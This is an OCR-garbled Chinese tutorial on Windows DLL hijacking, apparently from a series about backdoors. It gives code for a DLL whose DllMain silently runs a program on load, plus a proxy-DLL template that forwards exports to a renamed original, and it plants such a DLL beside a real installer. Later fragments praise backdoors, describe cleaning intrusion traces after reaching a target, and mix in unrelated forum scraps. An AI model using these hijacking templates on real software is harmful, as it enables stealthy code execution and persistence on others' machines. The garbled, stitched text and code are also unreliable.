以 第 二 季 的 demo 举 例 ， 它 无 自己 的 进程 ， 端 口 ， 服 务 ， 而 是 借助 notepad++ ( 非 dl 劫持 ) 来 生成 
php 内 存 shell (这 个 过 程 相当 于 插件 生成 ) ， 并 且 无 自 启 ， 当 服务 器 重启 后 ， 继 续 等 待 管理 员 使 用 
notepad++， 它 属于 一 个 AB 链 后 门 ， 由 A-notepad 生 成 B-shell， 以 B-shell 去 完成 其 他 工作 。 如 果 继 
续 改 进 Demo， 改 造 ABC 链 后 门 ，A 负 责 生成 ，B 负 责 清理 痕迹 ，C 负 责 工作 呢 ? 这 是 一 个 攻击 者 应 
该 思考 的 问题 。 


而 后 门 的 主要 工 1 越过 安全 产品 。2 维 持 持续 渗透 权限 。 
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n 


， 这 不 是 一 个 notepad++ 的 后 门 介绍 ， 它 是 一 个 demo， 一 个 类 后 门 ， 一 个 具有 源码 可 


+ 
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dl 劫持 -两 种 劫持 方法 剖析 
0x00 编译 介绍 


Release 的 exe 文 件 链接 的 是 标准 的 MFC DLL(Use MFC in a shared or static dl)。 这 些 DLL 在 安 
Windows 的 时 候 已 经 配置 ， 所 以 这 些 程序 能 够 在 没有 安装 Visual C++ 的 机 器 上 运行 。 而 Debug 版 
的 exe 链 接 了 调试 版 本 的 MFC DLL 文件 ， 在 没有 安装 Visual C++ 的 机 器 上 不 能 运行 ， 因 为 缺 相应 上 
DLL， 除 非 选择 use static dll when link。 1 






静态 编译 : debug 状 态 下 : MTd release 状 态 下 : MT 
动态 编译 : debug 状 态 下 : MDd release 状 态 下 : MD 


动态 编译 的 生成 的 可 执行 文件 的 exe 小 ， 但 是 运行 需要 系统 环境 具有 相关 的 dl 和 lib 文 件 ， 就 是 动 
调用 系统 相关 的 文件 才能 运行 ; 


静态 编译 生成 的 可 执行 文件 exe 大 ， 但 是 运行 的 时 候 不 依赖 于 系统 环境 所 依赖 的 dl 和 lib 等 环境 问 
题 ， 在 编译 的 时 候 已 经 这 些 dll 相 关 文 件 编译 进 了 exe 文 件 ， 所 以 exe 文 件 较 大 。 所 以 需要 自己 创建 
工程 需要 在 别 的 电脑 上 运行 ， 考 虑 到 稳定 性 ， 同 时 对 执行 文件 的 大 小 没有 要 求 的 话 还 是 尽量 选择 
态 编译 。 


所 以 综 上 所 述 ， 我 们 选择 静态 编译 ，Release! 


0x01 编写 一 个 dl 文件 


创建 dll 项 目 
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osoft Visual Studio 
















OQ XP. 
从 现 有 代码 创建 项 目 (E): 


MI IG £7 LC 


2 部 保存 (UD Ctrl+Shift+S 


最 近 的 文件 () » Team Foundation Server... 
最 近 使 用 的 项 目 和 解决 方案 人 : 
退出 (X) Alt+F4 





SPA 
E 
m 
NET Framework 45 > 排序 依据 : 默认 值 AES P3 y 
[2] Win32 控制 台 应 用 程序 Visual C++ RW: Visual C++ 
f | BEN RABIA SNC 用 于 创建 Win32 应 用 程序 、 控 制 台 应 用 程 
Visual Basic | Win32 项 目 | Visual C++ FR. DLL BORDERS ERIS 
BUE atl PR 
ual C# - 
sual C++ 
Windows 应 用 商店 


ATL 








MFC 


qut 

Win32 

Windows Phone 
Visual F# 


JL Server 


avaScript 











HA2.C\Study\demol\, ~ 
SERM): ^ dilinject (V 为 解决 方案 创建 目录 (D) 
门 添加 到 源 代码 管理 (U) 





确定 取消 


Win32 应 用 程序 向 导 - dilinjectt > 


应 用 程序 设置 


PDE 应 用 程序 类 型 : 添加 公共 头 文 件 以 用 于 : 
Windows ARIER U) 
控制 各 应 用 程序 (0) 






J| 安全 开发 生命 周期 (SDL) 检 查 iC) 


p- 


解决 方案 "dllinject1"(1 NAB) 
f dilinjecti 

EA 外 部 依 束 页 

L 兰 文件 


添加 (D} d E ms T 建 项 (WD)... Ctrl+Shift+A 
EE eS... Ctrl+Shift+X REG)... Shift+Alt+A 


跟 定 为 此 范围 (S) 新 建筑 选 器 () 
新 建 解决 方案 资源 管理 器 MAN) 类 ( 〇 .… 


BoM) Ctrl+X 资源 (R).… 
复制 (人 Ctrl+C 


删除 (D) Del 
2 Bee (M) 
FER) Alt+Enter 
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an - dilinjectt 


Xm. Visual C++ 
创建 包含 C++ 源 代码 的 文件 


Visual C++ 


Tt 
E» IRh) Visual C++ 


A i OE a a 


—— 


源 .cpp 
HA\2.O\Study\demol\dilinjectl\dllinject\ 


WOW) win 
b 338 Windows WA >, Release - Si, lm 


(2m) + © test(HWND hwnd, Hil 


(dl lexport) d “cdecl test (HWND i » HINSTANCE , LPSTR 


L* Title", L"Hello* m 





#include «Windows.h» 
07/7 这 是 导出 变量 的 一 个 示例 


extern "C" declspec(dllexport) void _ cdecl test(HWND hwnd, HINSTANCE hinst, LF 
(d 
" MessageBox(NULL,L" Title ",L"Hello",MB OK); 
return; 
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piprecise) 


UMT, /MTd, /MD, /MDd) 


XD WEE RAY MEO se wD) BAM) SOU TAD MAO BHD BOW We 
o- CER- ww LE Windows HRM ~ Release- M, [EE E m 


Li esc tlie 
- ~ e + © *esttHWND hwnd, HINSTANCE hinst, LPSTR IpszCmdline, int nC 


Lj 


JG, HINSTANCE + t, LPSTR 





0x02 两 种 劫持 方法 
0x02-1 第 一 种 dl 劫持 场景 : 
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EL PA 








运 于 时 加 载 的 未 知 dlj 文 件 


运行 的 时 候 ， 使 用 ProcessMonitor 监 听 


被 装载 之 后 创建 了 新 线程 。 

被 装载 之 后 一 个 线程 被 终止 了 

种 情况 下 执行 恶意 代码 ， 

jj 文件 是 否 可 用 性 ， 可 以 执行 rund1132 DllMain.dll aaaaaa( 随 便 加 函数 名 ) 调用 


3 DLL_PROCESS_ATTACH， 则 进程 加 载 DLL 时 就 会 执行 恶意 代码 


main.cpp : 定义 DLL 应 用 程序 的 入 口 点 。 
de <Windows .h> 


PIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 
) 


7 Switch (ul reason for call) 
Et 
[ Case DLL PROCESS ATTACH: 
E WinExec("calc.exe", SW HIDE); // 我 们 要 攻击 的 恶意 代码 
_ Case DLL THREAD ATTACH: 
| Case DLL THREAD DETACH: 
~ Case DLL PROCESS DETACH: 
break; 
} 
return TRUE; 
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SENSUM ~ax 
o- e ğe 
p- Lina in cpg 
E 解决 广安 dilinject1"(1 不 项 目 ) Windows -h> 
4 & dilinjectt 


Sl [102 7 1 


(^ DllMain( HMODULE 
DWORD 
LPVOID 


switch (u 


t 
case DLL PR 


return TR 


] 
所 有 松 利 。 


Jsers\user2\Desktop\dllInject>rundl132 dlliInjectl: dll 1 


4 D 


s\user2\Desktop \dllInject> 





0x02-2 *8 —fhdllZ]4/H7 8 : 


劫持 某 个 功能 〈 例 如 截图 ) 所 调用 的 dl 文件 
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E 















程序 运行 的 时 候 ， 监 控 某 个 功能 (例如 截图 ) 所 调用 的 d11 文 件 
骨 CFFExplorer 工 具 查 看 该 d11 文 件 (d11 文 件 名 为 B)， 导 入 目录 里 的 kerbe132.d11 里 是 否 调用 了 L 
i 时 调 用 了 LoadLibrary， 则 在 导出 目录 找 导 出 的 函数 名 (函数 名 为 C) 

主编 号 d11， 重 命名 为 B.d11， 将 原先 的 B. dl1l1 重 命名 为 B_origin.d1l1。B.d11 代 码 里 用 LoadLibr: 
行 该 程序 的 某 个 功能 ， 即 可 劫持 


导出 函数 的 代码 可 以 用 rundll32 dilExtern.dil test( 函 数 名 ) 调用 


PC" extern "C" 使 得 在 C++ 中 使 用 C 编 译 方式 成 为 可 能 。 在 "C++" 下 定义 "C" 函 数 ， 需 要 加 
攻关 键 词 。 用 extern "C" 来 指明 该 函数 使 用 C 编 译 方式 。 输 出 的 *C" 函 数 可 以 从 *C" 代 码 里 调用 


pec(dllexport) 的 作用 就 是 让 编译 器 按照 某 种 预定 的 方式 (前面 大 致 解释 了 这 种 方式 的 规则 ) 
天 出 函数 及 变量 的 符号 


有 态 链接 库 文件 中 包含 若干 公用 的 代码 、 数 据 等 ， 供 其 他 模块 使 用 。 动态 链接 库 是 将 应 用 程序 
化 的 重要 方法 ,动态 链接 库 中 的 函数 和 数据 可 以 同时 供 其 他 多 个 可 执行 文件 使 用 , 不 同 的 可 执 
灾 件 可 以 调用 同一 个 动态 链接 库 中 的 函数 。DLL 中 消 数 经 过 “导出 ”(export) 后 可 以 被 exe X 
HREAN. ETUR DLL 中 的 程序 调用 。 


nclude «Windows.h» 
对 这 是 导出 变量 的 一 个 示例 


tern "c" _declspec(dllexport) void _ cdecl test(HWND hwnd, HINSTANCE hinst, LF 


i 


T WinExec("calc.exe", SW HIDE); 
return; 


[ 
1 


~ © DiiMain(HMODULE hModule, DWORD ul reason 


动 持 d11 的 代码 模板 

假设 程序 加 载 的 d11 名 字 为 B，B. d11 的 导出 函数 为 C 
劫持 的 d11 名 字 改 为 B 

8B.d11 改 为 B_Origin.d1l11 

PrScrn 改 为 C 


PrScrn_origial,d11 改 为 B_ Origin.dll 
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ER 


Ce od 












lude <Windows.h> 
D. ^ ie 
n "C" — declspec(dllexport) void PrScrn(); 


APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 


itch (ul reason for call) 


‘case DLL PROCESS ATTACH: 

: WinExec("calc.exe", SW_HIDE); // 我 们 要 攻击 的 恶意 代码 
case DLL THREAD ATTACH: 

‘case DLL THREAD. DETACH: 

se DLL PROCESS DETACH: 

break; 


~ return TRUE; 


PrScrn() 


MessageBox(NULL, L"DLL Hijack! by DLLHijacker!", L":)", 0); // 我 们 要 攻击 的 恶 着 
= HINSTANCE hDllInst = LoadLibrary(L"PrScrn Origial.dll"); 


typedef DWORD(WINAPI *EXPFUNC)(); 

EXPFUNC exportFunc - NULL; 

exportFunc = (EXPFUNC)GetProcAddress(hDllInst, "PrScrn"); 
if (exportFunc) 


{ 


exportFunc(); 


j 
FreeLibrary(hDllInst); 


} 


return; 


03 本 地 dll 动 持 场景 模拟 


拆 一 个 exe 程 序 调用 dl 文件 ， 然 后 用 自己 的 dll 去 动 持 


03-1 创建 dl 项目， 项 目 名 为 aaa 
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&include «Windows.h» 
// 这 是 导出 变量 的 一 个 示例 


extern "C" declspec(dllexport) void _ cdecl test(HWND hwnd, HINSTANCE 
t 


Hnst, LE 


MessageBox(NULL，TEXT(" 我 是 程序 运行 时 正常 加 载 的 d11" )， TEXT("hello"), NULL); 
return; 


^d, HINSTANCE H ; UPSTR 


TEXT C^hetlo"), 


> 最 近 NET Framework 45 > 排序 依据 : 默认 值 


ors = : 
已 安装 Visual Cot | RE: Visual C++ 


4 模板 — ——— 用 于 创建 使 用 Microsoft SURE HS 
b Visual Basic MFC ActiveX 控件 Visual C++ 程序 的 项 目 
© Visual C# 
4 Visual C++ 
Windows 应 用 商店 
ATL 
CLR 
ER 


MFC DU. Visual C++ 


Los 
Win32 
Windows Phone 
t Visual Fit 
SQL Server 
b JavaScript 
LightSwitch 


解决 方案 (S); MRA 


解决 方案 名 称 (M): 。 MFC aaa (V) 为 解决 方案 创建 目录 (D) 
门 添加 到 源 代码 管理 (U) 
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E REFS - MFC aaa 


应 用 程序 类 型 


应 用 程序 兴 型 : 项 目 类 型 
单个 文档 人 3) e MFC 标准 (A) 
多 个 文档 好) 


e 基于 对 话 框 (D) 
使 用 HTML. 对 话 框 (I) 
(125089883 MC 控件 (0) 
多 个 顶级 文档 (I) 


; (ec 的 使 用 : 
e 在 共享 DLL 中 使 用 Mic) 


J REAR mAN CSDL AGB (C) 在 静态 库 中 使 用 MEC(E) 


KNEE oo 
RXGH RED 00 ov 


m 使 用 Unicode ED 









EF- SEIER 
工具 箱 里 托 一 个 按钮 


SRE BV) MEP) ERB) WROD) BAM) SQQ ERO) LEM IRC) AMN) EW) SAH) 


-Suë 9- 本 地 Windows WWE ~ Debug - 8 . 器 =H 


ne 











MFC aaa.h 
B MFC aaaDlg.h 
3 Resource.h 
B stdabch 
& targetver.h 
文件 
** MFC aaa.cpp 






. . 
Button] = 
. LJ » 


+ MFC aaaDlg.cpp = 
*+ stdafx.cpp 


EJ MFC aaa.ico Ei 

B) MFC aaa.rc 

B MFC aaa.re2 
D ReadMe.txt 





局 击 按 馈 ， 在 OnBnclickedButton1 函 数 里 添加 代码 
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so || WÄ 


s[i 





void CMFC aaaDlg::OnBnClickedButtoni() 


t 
// TODO: 在 此 添加 控件 通知 处 理 程序 代码 
typedef DWORD (*TEST)(); 
HINSTANCE hLibrary; 
hLibrary = LoadLibrary(TEXT("aaa.d11")); // f&FBLoadLibraryjgg 
TEST test = (TEST)GetProcAddress(hLibrary, "test"); // 获取 dl11 文 件 的 本 
test(); // STER 

} 


> Ai Windows tH - Debug - M. im PD A 


O ooc Dag 


CDialogEx: :OnPaint(); 


D MFC aaaDigh 
B -Resource SHCURSOR CMEC. aaaD1g: :;OnQueryDragicon() 
a etdafh { 


B eror return static cast«HCURSOR» (m. hIcon); 


4 d mx 
> o MEC aaa.cpp 
b 4% MFC aaaDig.cpp 
++ stdabx.cpp. 
ENTE 
E MFC_aaaico 
个 MFC aaarc 
D) MFC _aaa.rc2 
D ReadMe.txt 


CMFC_aaaDlg::OnBnClickedButtoni() 


type DWORD (*TEST) 

HINSTANCE hLibrar 

hLibrary = [ Xi 

TEST test = (TEST)G ocAddress(hLibrary, ` 
test(}; 





编译 即 可 。 将 aaa.dll 文 件 拖 到 MFC_aaa.exe 当 前 目录 下 


Qux 26 Study » demol MFC aaa » Release 


A MFC_aaa.exe 
&J MFC aaa.pdb 


aaa.dll 


运行 MFC_aaa.exe， 点 击 Button1， 成 功 加 载 aaa.dll 文 件 
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de » boc | 
EX gue a 
| hello | 
| 
| 
| 
| 


Buttoni 


i 
| 
ii 
cji 
E, 
hi 
3 
if 
er 
ue 









)3-3 模拟 劫持 未 知 的 dl 文件 


"C aaa.exe 程 序 运行 的 时 候 ， 会 加 载 aaa.dll 文 件 。 那 么 当 我 们 用 ProcessMonitor 去 检测 ， 发 现 
上 文件 不 存在 ， 并 且 还 调用 了 LoadLibrary。 那 么 此 时 就 可 以 劫持 。 


天 始 模拟 : MFC_aaa.exe 当 前 目录 下 没有 任何 dl 文件 





Ec. Study » demo! MFC aaa » Release vo SE Rele 
3 MFC_aaa.exe 2 W 48 KB 
& MFC aaa.pdb n Debi (B 


和 ProcessMonitor 监 听 
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eration Result 














Frocexcés. exe 


^J&IEIS RIS e 
jeeeeecc | 


DE) we 











| *. Process Monitor Fiker, | 
| A T3 Js E 


UZITAN 加 载 了 Es 在 的 dl1 


| FUE PO CI asa Ma ek 


v NAME NOT FOUND. 





运行 MFC_aaa.exe， 点 击 button1 发 现 程序 加 载 aaa.dll 文 件 ， 从 当前 目录 开始 查找 ， 但 是 结果 都 是 
没有 找到 。 


引出 一 个 知识 ，dll 查 找 路 径 





1 .程序 所 在 目录 。 

2 .加 载 DLL 时 所 在 的 当前 目录 。 
3 .系统 目录 即 SYSTEM32 AR. 
4.16 位 系统 目录 即 SYSTEM BR. 
5 .Windows 目 录 。 

6 . PATH 环境 变量 中 列 出 的 目录 
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- Sysinternals: saw, sysinternals.com T = 


Options Help 





NAME NOT FOUND 
NAME NOT FOUND 


E 
? 


sluser: 


LangusgéPack 
Languagefack 








Language? ack 
goagéFack 









DST SS 
eateFil 












ssa Releaze saa 
& Java javapat 
10784 asa 


E 










rosoft ASP, 





H 





Scripts ess. dll 
asa dll 


Scri 










ITTPTPLPTPPPPTTPLLELRLRRRLEERLLELLLLLLELLLLLLL 


600000n0onoooonono 








cwRAPDs ABA d 





5,986 events (0.015%) Backed by virtual memory 


.dl 的 Stack， 发 现 程序 是 通过 LoadLibrary 加 载 的 aaa.dll， 那 么 这 种 情况 下 就 可 以 做 动 持 
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2} Event Properties — m X l 
: — : * 
Event Process Stack 
1 | Frame Module Location T | 
3 | U 18 ntdil. dll memset + Oxlee3d | 
IUi9 ntdlldll Ldrinitializethunk - 0x63 | 
d |U20 nud LdrinitislizeThunk - Oxe | fi 
: | U21 ntdlidli ZwQueryAttributesFile + Oxe | : 
X | U22  ntdil.dll RtlRunOnceBeginInitialize + 0x45a | s 
| U23 ntdil. dil RtlRunOnceBeginInitialize + Ox76e | : 
| U 24 ntdil dl? RtlOpenCurrentUser + Oxleê | F 
à | U25 ntdil dil RtlRbInsertNodeEx ~ 0686 | e 
4 |U26 ntdildll RtlRbInsertNodeEx + 0x90b | P 
d [U2 mara LdrLoadDll - Oxtée aus 
i l U 23 ntdil. dll LdrLoadDll - 0x93 | 日 
4 | Karnal = 11 las E avr æ | s 
* KerneiBase. dil | : 
à : Soe 2 tedButtonl + Oxb, h:\2 c | e 
: | U32 afell0u dil mfcilOu.dll + 0x1649 j = 
J |U33 mfciidudll — mfcll0u.dll - Ox1f28fc : 
: | U 34 mfeiidu dll mfcilOu. dll + Ox24bb67 | 
d  |U35 ateltudil sfcliQu dll + Oxc33bb | 
d | U 36. wfeil0u dll — mfelidu.dll + Oxa243 | 
i: | U 37 wfeoliOu dii mfcllOu. dli + Ox84ee | 
q | U 38. sfeli0u.dil  sfell0u. dll - 0x8596 || 
OQ | U39 ztcligu dl  sfcllðu dll - 0x8ta4 “i | 
: Properties... Search. Save... ^ 
4 t $ next Highlighted 


iis, RARR, MAREA 
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b dlimain.cpp : 定义 DLL 应 用 程序 的 入 口 点 。 
include <Windows .h> 


00L APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason. for call 
LPVOID lpReserved 


r 


switch (ul_reason_for_call) 
{ 
case DLL_PROCESS_ATTACH: 
WinExec("calc.exe", SW HIDE); // 我 们 要 攻击 的 恶意 代码 
case DLL THREAD ATTACH: 
case DLL THREAD. DETACH: 
case DLL PROCESS DETACH: 
break; 


} 
return TRUE; 





include «Windows.h» 


DliMain( HMODULE 
DWORD 
LPVOID. TPR: 


break; 
} 


return TRUE; 


THER P^dlllnject1.dlli& 4544 Haaa.dil, #HEMFC_aaa.exe ARTF, ij&ÍTMFC. aaa.exe; 






成 动 劫持 了 MFC_aaa exe 运行 时 加 载 的 dl 文件 
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x 
EL 
rs 
y mm; 一 口 x 
= 标准 3 
| Buttoni 
0 
M+ M: MS 
Yo v xs Vx 
RE C CHEN Rec 





0x03-4 模拟 劫持 存在 的 dl 文件 


MFC_aaa.exe 当 前 程序 目录 下 面 存在 aaa.dll 文 件 





HJ o» C Study » demo! » MFC aaa » Release 
^ ü D 
a, MFC aaa.exe 
&) MFC aaa.pdb 
aaa.dll 
2 


eM IPE 7AO AT 93m 


| Tine of Day Process Sane 





FID Operation 


Fath 





| Path 


j 
| 
| Reset 
| 























The current filter excludes all 627,148 events Backed by virtual memory 


ris 


运行 MFC_aaa.exe 
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zk Ee BS ERFIR * 
^ WEEE > file (H) > 2C > Study 
MFC_aaa zx 公称 
ipch Ay MFC _aaa.exe 
MFC_aaa P MFC_aaa.pdb 
Release aaa.dll 
res 
Release 
MFCApplicationt 
nbtscan 
NetGroupGetUsers 
NetLocalGreupEnum 





NetLocaloroupGetMeml 
NetUserEnum 
NetUserGetinfo 

Projecti 

regOperate 

socket client 


sncket server 





Result 


* Process Monitor Filter 


Display entries matching these conditens; 





v endswiüh v 


re | 





Cancel 


demot 














www.sysinternals.com 
piter Tools Options Help 
EvAOSA'X43S1uM —— Gon m 5 


pers’ 



















Nace Rete 





succes? 









iced iare 








EFEFEF] 





ta ta ta Ma ta o ta U 


yeh A ES Da ph oh bh t 
th ch ta 9 Un ih EPA 







1 
PPRPP 
ESSE! 


by ay HO WO A wD AH HOH HH 4 
EA 
Dhooononponononono 


Release 


ESS 






densi MPC asa Releare 
degol MPC ssa Release 
Release 
Release 
Pelesse 





PETET 
zx 


Jo 


oed 


9 06 events (0.016%) i i 


gd ELI A min 












27 Event Properties - D x 








a dll Event Process Stack I 
Se dil | 


Fraze Module 
U2: nu 


2z 
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reMsssaging 211 
CoreMessmging ill 





PT 
器 








gu 
aS 








! d ela ale 4 
ARS RO & & B 


SEE BTR TO 
















Release 




















Ü 
u 
u 
u 
u 
u 
u 
u 
u 
u 











B Oresteriies x elesse h ; 
# NTC aaa Release p 
# s denol MPC sas Release z 5 
E MEC aaa Release 42 
XP^ sas Release i f 
w Us: $ 








000606000035 


Bees 


ME II - : Tir Jext Highlighted tor At 
1,200,269 events (0.01296) Backed by virtual memory z 






taz: ver ae a aman ores 





CFFExplorer#s £iaaa.dllxc ftt 
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we CFF Explorer VIII - [aaa.dll] I n 
文件 ”设置 ”帮助 psd 2 *. 


H, nA Manzo 


2) Dos KAB 
SN 头 部 











| SFR RVA 













00004854 







ETE UR Meca - ODIUM UE SESE: 





os 0T _{nfunctions) » |Dword — — -一 ~ 一 —— — = $ pwo : A 
ia pae 1 0000C170 00000000 00000000 O000Ct8g — 
00C1 
习 数据 目录 Id 86 






STAR bd 
: 目录 
EUR 
[3 重 定位 目录 
同调 目录 
号 地 址 转换 
A 依赖 性 分 析 
Ny Hex 编辑 器 | | 
Ap - m — € 和 - PUN SAT 

^, SAM | Nee sss 

PRET 
"VEA 
VERRE 


0000C626 
















WriteFile 








GetModuleFileNameW 


0000C526 RtlUnwind 








0000C532 0000C532 034D HeapAlloc 









0000C53E 0000C53E 0354 HeapReAlloc 







| w CFF Explorer VIII - [aaa.dll] 
| 
| 文件 设置 帮助 


lo 4 8 


























RECS | | 
日 习 文 件 : aaa dil loc ere AUR E Ef. LN 3 E] 
3) Dos 头 部 Characteristics | 00000000 
Saree TimeDateStamp | 5D87F2F0 
3 可 选 头 部 MajorVersion | 0000 

MinorVersion | 0000AE4A | Word | 0000 
Name | | | 0000C672 
| 00000001 
注重 定位 目录 7 
COBUBR [00000001 








| 00000001 











ms 





(nFunctions) | Dword 





也 资源 编辑 器 00000001 00001000 





开始 编写 动 持 代码 ， 使 用 extern 进 行动 持 ， 如 果 动 持 成 功 ， 就 会 弹出 计算 机 ， 并 和 且 弹 框 *DLL Hijack! 
by DLLHijacker!" 
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DWORD ul reason for call, 
LPVOID lpReserved 











"case DLL PROCESS ATTACH: 


a 


"case DLL THREAD. ATTACH: 


case DLL PROCESS DETACH: 
a break; 
(H 


Am 
= return TRUE; 


| MessageBox(NULL, L"DLL Hijack! by DLLHijacker!", L":)", 0); 
D HINSTANCE hDllInst - LoadLibrary(L"aaa Origial.dll"); 
X if (hbllInst) 


{ 
typedef DWORD(WINAPI *EXPFUNC)(); 
EXPFUNC exportFunc = NULL; 
exportFunc = (EXPFUNC)GetProcAddress(hDllInst, "test"); 
if (exportFunc) 
{ 
exportFunc(); 
} 
FreeLibrary(hDllInst); 
} 


return; 
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y WinExec("calc.exe", SW HIDE); // 我 们 要 攻击 的 恶意 代码 


// 我 们 要 攻击 的 恶 填 


LI inn] 


wer 


DIMain( HMODULE 
DWORD 
ea ext LPVOID 


id test() 


ek Sage (NOEL, L"DLl 
HINSTANCE hDllInst 
(hDllInst) 





将 编译 好 的 文件 放 到 MFC_aaa.exe 同 目录 下 ， 并 且 重 命名 为 aaa.dll。 原 先 的 aaa.dll 重 命名 为 
aaa_Origial.dll. 


i. 
n2 
C 


Study > demot MFC aaa Release 


35, MFC aaa.exe 
& MFC aaa.pdb 
aaa Origial.dll 


aaa.dll 


运行 后 成 功 劫持 ， 弹 出 计算 机 和 弹 框 
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e 








DLL Hijack! by DLLHijacker! 





实战 dl 劫持 


—: 音速 启动 安装 时 的 dll 动 持 
音速 启动 调用 的 dl 






oi Vee 7vAO 04A ERATE 


: 4 
| 
a Process Nama 7:2 perst Fath 
E: sms | 
| 
| 


n 
pt 


» dilinject 


Display entries matching these conaitons: 


E y ~ then Indude v 
y setup vstartS.exe Architecure s 
à Add 
^ 
~ 








一 个 不 存在 的 dll 调 用 了 LoadLibrary 
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ee C 1 : , 
SU ABR VAS YH aS KAA DM 


FID Operation 












Qv E 
Eet s se mn 
€T diiteject 

= 


Sy setup, vstartS.exe 





C$314 Pro 


ces 


ci Nm he 








CAProgram Files (X85) WStart 





Mecccececceccecce 


Viv 





编写 劫持 dl 


// dllmain,cpp : 定义 DLL 应 用 程序 的 入 口 点 。 
#include «wWindows.h» 


BOOL APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 


switch (ul reason for call) 
{ 
case DLL_PROCESS_ATTACH: 
WinExec("calc.exe", SW_HIDE); // 我 们 要 攻击 的 恶意 代码 
case DLL THREAD ATTACH: 
case DLL THREAD DETACH: 
case DLL PROCESS DETACH: 
break; 


} 
return TRUE; 


将 dll 重 命名 为 Riched20.dll， 并 放 到 音速 启动 程序 的 同 目录 下 
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lg setup. vstart5.exe 2019/3 1:3 
|] Riched20.dll 2019/10/29 17 





到 行程 序 ， 成 功 弹出 计算 机 


Bee - maan Moo ne -~ 一- anes 
i 


心 口 x 
Is D| 


i 
i 
| vo Sd! 





M+ M- MS 


UR x? Vx 


Program Files (x86 VStart| We)... 
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APTH (RR) Esc oh 


Ri m2 BURY, TARS 则 试 的 

ik, HBSS, Th HOSP. 以 及 安全 公 
后 门 的 基本 容 杀 ， 与 高 
p FERRE, sei. 
AEEUZAUSBuD, BAR E 


























依然 遵循 以 往 ， 引 入 概念 ， 只 有 概念 清册 
性 ， 潜伏 性 ， 锁定 性 等 。 对 于 防御 者 ，i 5] 
方法 ， 切 断 攻 击 者 的 后 渗透 攻击 。 湖 源 或 取证 攻击 者 。 


式 执行 标准 主要 分 为 6 段 1 报 。 既 : 









在 高 级 持续 023 





Jr, PTESByS 





1 .前 期 交互 阶段 
2 .情报 收集 阶段 
3 .威胁 建 模 阶段 
4 ,漏洞 分 析 阶 段 
5 , 渗透 攻击 阶段 
6 , 后 渗透 攻击 阶段 
7 ,报告 编写 


目标 补丁 情况 ， 了 解 目标 第 三 方 利用 等 。 
内 网 渗透 的 本 质 是 什么 ? 
DUE 搜集 目标 内 网 的 组 织 架 构 







渗透 与 高 级 持续 渗透 的 本 质 区 别 是 什么 ? 


区 别 于 "持续 "， 可 长 
(而 在 高 级 持续 渗 ; 


溯源 取证 与 对 抗 溯源 取证 的 本 质 是 什么 ? 









x 


Lord en y A nS DIE Sok 
7J ŝi 3229, 
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* zx 
而 后 渗透 ， ai 3i 








防御 者 的 作息 规律 ， 


——— Sinis n 
但 不 限制 于 日 志 异 常 ， 合 










的 信息 进行 


Yi at 






ks. 并 具备 8 
性 和 组 织 性 地 窃取 数据 , D 





RHODE 数字 空 : 间 的 偷 











要 区 别 于 高 级 持续 渗 
核心 资料 为 目的 ， 并 且 是 
Wm. |i 





BUH ADRSAARONBS, MERR, TKRRIGISISUR S EAEN. 
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提 权 略 过 。 得 到 服务 器 权限 。 


内 网 渗透 略 过 ， 配 合 人 力 情报 ， 大 致 清楚 目标 内 网 架构 。 直 奔 内 网 终端 管理 系统 。 
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桌面 截图 : 确定 为 目标 人 物 







Bee REE ” 转 到 (6) ma 系统 28H (4 


€ -48 eee cag 


E 


在 务 文件 后 ， 清 理 入 侵 痕迹 。 任 务 完 成 。 


i 





BA Trdem 
BUT, 5 
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/ ES ~" T 


yw h 
! [1(./img/20191101153255812646456 . png) 


可 能 某 老 夫 跳出 来 ， 大 喊 ， 后 门 的 人 性 化 制作 就 这 一 个 也 能 算 艺术 ? 
在 现实 中 ， 我 很 喜欢 问 别 人 三 个 问题 : 

工 .你 用 过 最 糟糕 的 后 门 是 什么 样 的 ? 

2 .你 用 过 最 精彩 的 后 门 是 什么 样 的 ? 

3 .你 最 理想 的 后 门 是 什么 样 的 ? 


问题 1 .能 大 致 分 析出 对 方 的 入 行 时 间 

问题 2 . 能 大 致 的 判断 出 对 方 目前 的 技术 水 平 

问题 3 .能 直接 判断 出 对 方 对 技术 的 追求 是 怎样 的 心态 
后 门 是 一 种 艺术 。 


在 文章 的 结尾 处 ， 我 想 贴 几 
杂 的 知识 都 会 找到 相关 的 文章 。 





当前 位 置 : 首页 > 技术 视频 教程 > ASM) > ewebeditorfRiBzS SE WEBSHELL 


euebeditorfjafH 25 $$ WEBSHELL 


软件 大 小 : 12.0 MB 软件 语言 : Bite [aj2 A * 
软件 授权 : 免费 教程 ewebeditor | 
H2: ewebedi tortf 





QAFA: WinXP, Wint, Win, WinAll 


^. $ M ae 
WWW 网 皮 评分 : 3 nae 


T 





BIOS + xs Telnet/al] 


创建 时 间 : 2009-03-19 
文章 属性 : ma 
BBs: cheng5103 (che$eg 5103 at 128. com) 





DERE 
“该 项 目 仅 为 实验 性 项 目 , 目的 是 学 习 国外 技术 。 该 项 目 : 
在 主板 的 BTDs 内 , 并 计 其 随 荐 计算 机 系统 及 操作 系统 成 功 的 二 


.现在 : 想 学 习 的 人 ， 找 不 到 入 门 的 知识 ， 与 可 以 建立 兴趣 的 文章 。 想 分 享 的 人 却 又 胆战心惊 。 
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Š ; 
PSR STR AIMEE 7, RBM RS HS, iS we cs EDU PRS FE SS 






in 
pa rich 一 
| 


DH 34< BRIT 
标题 给 似 错 了 吧 ., Metasploithhimk EES T 


内 容 也 天 糖 楼 的 ， 后 面 的 部 分 这 人 简单 的 内 容 一 堆 也 汉 讲 清 芍 , 例 于 也 有 问题 


n. Dao etm ^ EI ut j 
互联 网 网 络 安全 Aer (Hacker) 


二 位 黑客 入 门 失败 的 初学 者 ? 
抱 有 远大 志向 ， 却 从 来 没有 真正 的 入 门 ， 唯 一 的 成 就 就 是 成 功 get 一 个 网 站 的 后 人 台 账 号 密码 ， 密 码 是 经 
过 加 密 的 ， 挂 了 那么 久 我 的 名 字 ， 想 改 回 去 的 时 候 发 现 做 不 到 了 。。 我 一 直 徘 徊 在 黑客 殿堂 的 门口 ， 


知 平 某 大 v 的 回忆 当初: 

E, 虽然 我 们 还 处 于 脚本 小 子 阶段 但 是 在 这 些 杂志 的 责 尝 目 染 下 ， 对 杂志 里 提 到 的 几乎 所 有 的 领 
MESTIE: MATA ARSE MARK MOSE RER …- 

